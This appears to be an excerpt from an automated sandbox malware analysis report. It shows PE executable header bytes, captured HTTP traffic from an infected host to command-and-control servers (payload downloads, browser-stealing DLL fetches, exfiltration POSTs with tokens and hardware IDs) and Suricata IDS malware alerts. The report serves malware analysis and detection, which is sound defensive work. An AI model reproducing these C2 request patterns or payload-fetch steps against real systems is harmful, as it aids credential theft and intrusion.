5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 07:09:00 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /files/5131681669/4ZAAIhb.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 33 36 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013367001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 33 37 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013372001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 33 37 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013373001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 39 39 31 45 36 43 39 44 35 33 34 32 32 38 33 31 39 34 30 33 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 2d 2d 0d 0a Data Ascii: ------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="hwid"3A991E6C9D534228319403------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="build"stok------DAAFBAKECAEGCBFIEGDG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHCBAAEHCFIDGDHJEHCHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 36 33 65 32 36 63 65 39 62 34 35 39 31 64 66 37 37 36 37 61 34 32 63 66 64 65 63 33 37 32 33 66 61 62 64 30 65 33 62 37 39 36 65 64 62 33 33 63 36 39 37 32 65 36 30 32 38 33 66 64 64 34 30 66 31 61 35 36 37 32 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 2d 2d 0d 0a Data Ascii: ------DGHCBAAEHCFIDGDHJEHCContent-Disposition: form-data; name="token"3063e26ce9b4591df7767a42cfdec3723fabd0e3b796edb33c6972e60283fdd40f1a5672------DGHCBAAEHCFIDGDHJEHCContent-Disposition: form-data; name="message"browsers------DGHCBAAEHCFIDGDHJEHC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFHIJKJKFIDHJKFBGHCHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 46 48 49 4a 4b 4a 4b 46 49 44 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 36 33 65 32 36 63 65 39 62 34 35 39 31 64 66 37 37 36 37 61 34 32 63 66 64 65 63 33 37 32 33 66 61 62 64 30 65 33 62 37 39 36 65 64 62 33 33 63 36 39 37 32 65 36 30 32 38 33 66 64 64 34 30 66 31 61 35 36 37 32 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 49 4a 4b 4a 4b 46 49 44 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 49 4a 4b 4a 4b 46 49 44 48 4a 4b 46 42 47 48 43 2d 2d 0d 0a Data Ascii: ------ECFHIJKJKFIDHJKFBGHCContent-Disposition: form-data; name="token"3063e26ce9b4591df7767a42cfdec3723fabd0e3b796edb33c6972e60283fdd40f1a5672------ECFHIJKJKFIDHJKFBGHCContent-Disposition: form-data; name="message"plugins------ECFHIJKJKFIDHJKFBGHC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEBFCFIJJKKECAKJEHDHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 36 33 65 32 36 63 65 39 62 34 35 39 31 64 66 37 37 36 37 61 34 32 63 66 64 65 63 33 37 32 33 66 61 62 64 30 65 33 62 37 39 36 65 64 62 33 33 63 36 39 37 32 65 36 30 32 38 33 66 64 64 34 30 66 31 61 35 36 37 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 2d 2d 0d 0a Data Ascii: ------AKEBFCFIJJKKECAKJEHDContent-Disposition: form-data; name="token"3063e26ce9b4591df7767a42cfdec3723fabd0e3b796edb33c6972e60283fdd40f1a5672------AKEBFCFIJJKKECAKJEHDContent-Disposition: form-data; name="message"fplugins------AKEBFCFIJJKKECAKJEHD--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKJDGCGDAAAKECAKKJDHost: 185.215.113.206Content-Length: 6763Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 33 37 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013374001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIIIJDHJEGIECBGHIJEHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEGHJJDGHCAKEBGIJKJHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 36 33 65 32 36 63 65 39 62 34 35 39 31 64 66 37 37 36 37 61 34 32 63 66 64 65 63 33 37 32 33 66 61 62 64 30 65 33 62 37 39 36 65 64 62 33 33 63 36 39 37 32 65 36 30 32 38 33 66 64 64 34 30 66 31 61 35 36 37 32 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------IIEGHJJDGHCAKEBGIJKJContent-Disposition: form-data; name="token"3063e26ce9b4591df7767a42cfdec3723fabd0e3b796edb33c6972e60283fdd40f1a5672------IIEGHJJDGHCAKEBGIJKJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IIEGHJJDGHCAKEBGIJKJContent-Disposition: form-data; name="file"------IIEGHJJDGHCAKEBGIJKJ--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 33 37 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013375001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEHJEBKFCAKKFIEHDBFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 36 33 65 32 36 63 65 39 62 34 35 39 31 64 66 37 37 36 37 61 34 32 63 66 64 65 63 33 37 32 33 66 61 62 64 30 65 33 62 37 39 36 65 64 62 33 33 63 36 39 37 32 65 36 30 32 38 33 66 64 64 34 30 66 31 61 35 36 37 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 2d 2d 0d 0a Data Ascii: ------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="token"3063e26ce9b4591df7767a42cfdec3723fabd0e3b796edb33c6972e60283fdd40f1a5672------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="file"------CAEHJEBKFCAKKFIEHDBF--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49766 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49799 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49783 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49806 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49807 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49814 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49820 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49828 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49829 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49840 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49827 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49845 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49847 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49855 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49854 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49875 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49886 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49878 -> 154.216.20.243:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49879 -> 154.216.20.243:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49933 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49924 -> 154.216.20.243:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49880 -> 185.215.113.206:80
